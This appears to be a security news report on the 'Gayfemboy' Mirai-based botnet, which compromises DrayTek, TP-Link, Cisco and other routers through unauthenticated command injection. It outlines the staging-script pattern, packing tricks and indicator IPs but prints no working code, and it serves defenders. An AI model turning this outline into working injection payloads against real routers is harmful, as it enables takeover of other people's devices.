New Stealthy Malware Exploiting Cisco, TP-Link and Other Routers to Gain Remote Control

A newly observed malware campaign has emerged targeting a broad range of network appliances, including routers from DrayTek, TP-Link, Raisecom, and Cisco.

Throughout July 2025, threat researchers observed a stealthy loader spread by exploiting unauthenticated command injection flaws in embedded web services.

Initial compromise is achieved through straightforward HTTP requests, which silently deliver a downloader script tailored for each product. Once executed, these scripts fetch and launch the primary payload, granting attackers remote control over vulnerable systems worldwide.

The malware, dubbed “Gayfemboy” by its discoverers, builds upon the infamous Mirai botnet lineage but introduces significant enhancements in stealth and modularity.

Its infrastructure has been traced to a consistent download host at 220.158.234.135, while attack traffic originates from 87.121.84.34.

Payloads are delivered as seemingly innocuous files named after specific device architectures—such as “aalel” for AArch and “xale” for x86-64—to evade signature-based detection.

Following initial download, the malware proceeds to establish persistence, employing UPX packing with a modified magic header to foil automated unpackers.

Fortinet analysts noted that the campaign’s global footprint includes targets in Brazil, Mexico, the United States, Germany, France, Switzerland, Israel, and Vietnam, spanning sectors from manufacturing to media.

The attackers leverage both HTTP and TFTP transports based on device capabilities, ensuring high success rates even in environments with limited outbound connections.

Analysis of the malware

Once the loader stages complete, the attacker gains a foothold with full root privileges, enabling further reconnaissance and lateral movement.

In this report, we delve deeper into the malware’s infection mechanism to shed light on how routine firmware interfaces are weaponized.

Attackers craft specific URI paths to trigger command injection in router web management panels.

Here, the unauthenticated endpoint accepts arbitrary shell commands in the country parameter.

Upon receipt, the targeted router executes a lightweight shell snippet that downloads and executes the architecture-specific binary.

DrayTek devices exhibit analogous behavior through mainfunction.cgi.

Each staging script follows a consistent pattern: change to a writable directory, fetch the downloader, grant execution permissions, invoke it with a product identifier, and then remove traces.

By tailoring filenames and parameters to each vendor, the attackers avoid simple pattern matching while streamlining deployment across heterogeneous fleets.

Continuous monitoring of /proc/[PID]/exe further enables the malware to eliminate competing infections and debugging hooks, solidifying its control over the device.

This injection-driven infection mechanism underscores the need for rigorous firmware integrity checks and network segmentation to prevent similar botnet campaigns.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.